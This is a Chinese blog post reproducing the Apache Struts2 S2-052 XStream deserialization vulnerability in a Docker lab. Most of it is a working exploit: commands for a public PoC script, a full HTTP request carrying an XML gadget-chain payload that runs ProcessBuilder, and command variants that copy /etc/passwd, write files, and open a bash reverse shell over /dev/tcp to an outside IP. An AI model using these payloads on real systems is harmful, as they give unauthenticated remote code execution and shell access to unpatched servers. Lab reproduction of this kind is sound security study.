S2-052 漏洞复现
发布日期:2021-05-09 05:19:34
浏览次数:11
分类:博客文章
本文共 3039 字,大约阅读时间需要 10 分钟。
Structs2框架已知的漏洞编号如下:
- S2-005
- S2-009
- S2-016 (含S2-013)
- S2-019
- S2-020
- S2-021
- S2-032
- S2-037(含S2-033)
- DevMode
- S2-045
- S2-046
- S2-048
- S2-052
- S2-055
- S2-057
S2-052()环境:
访问 http://你的 IP 地址:端口号/
漏洞poc检测与利用
poc下载:
检测到漏洞存在:
python apache-struts-pwn.py -u 'http://192.168.190.135:8080/orders/3/edit'
漏洞利用写入文件
python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'
POST /orders/3 HTTP/1.1
Host: 192.168.190.135:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/xml
Content-Length: 2415
Connection: close
Referer: http://192.168.190.135:8080/orders/3/edit
Cookie: JSESSIONID=8FCB55C3A30CB6059D3530A01C3E6FA0
Upgrade-Insecure-Requests: 1
DNT: 1
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>touch</string>
<string>/tmp/success</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
以上数据包成功执行的话,会在docker容器内创建文件/tmp/success,
执行docker-compose exec struts2 ls /tmp/即可看到。
docker-compose exec struts2 ls /tmp/
读文件:
<command> <string>cp</string> <string>/etc/passwd</string> <string>/tmp/passwd</string> </command>
写文件:
<command>
<string>bash</string>
<string>-c</string>
<string>echo micr067 > /tmp/test.txt</string>
</command>
反弹shell:
<command> <string>bash</string> <string>-c</string> <string>bash -i >&; /dev/tcp/192.168.190.130/1521 0>&;1</string> </command>
参考链接:
发表评论
最新留言
初次前来,多多关照!
[***.217.46.12]2025年04月12日 18时14分00秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
wait()与notify()
2021-05-09
使用js打印时去除页眉页脚
2021-05-09
Spring security OAuth2.0认证授权学习第二天(基础概念-RBAC)
2021-05-09
ORA-00904: "FILED_TYPE": 标识符无效
2021-05-09
MapReduce实验
2021-05-09
[apue] getopt 可能重排参数
2021-05-09
移动互联网恶意软件命名及分类
2021-05-09
PySide图形界面开发(一)
2021-05-09
vue3 template refs dom的引用、组件的引用、获取子组件的值
2021-05-09
882. Reachable Nodes In Subdivided Graph
2021-05-09
375. Guess Number Higher or Lower II
2021-05-09
764. Largest Plus Sign
2021-05-09
等和的分隔子集(DP)
2021-05-09
L - Large Division (大数, 同余)
2021-05-09
39. Combination Sum
2021-05-09
41. First Missing Positive
2021-05-09
80. Remove Duplicates from Sorted Array II
2021-05-09
83. Remove Duplicates from Sorted List
2021-05-09
410. Split Array Largest Sum
2021-05-09
程序员视角:鹿晗公布恋情是如何把微博搞炸的?
2021-05-09
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 459936671 位访客
访问时间: 2025-04-21 15:21:13
访问IP: 18.218.206.106
Copyright © 2020 - 2025 css8.cn 京ICP备2021015314号-1
手机版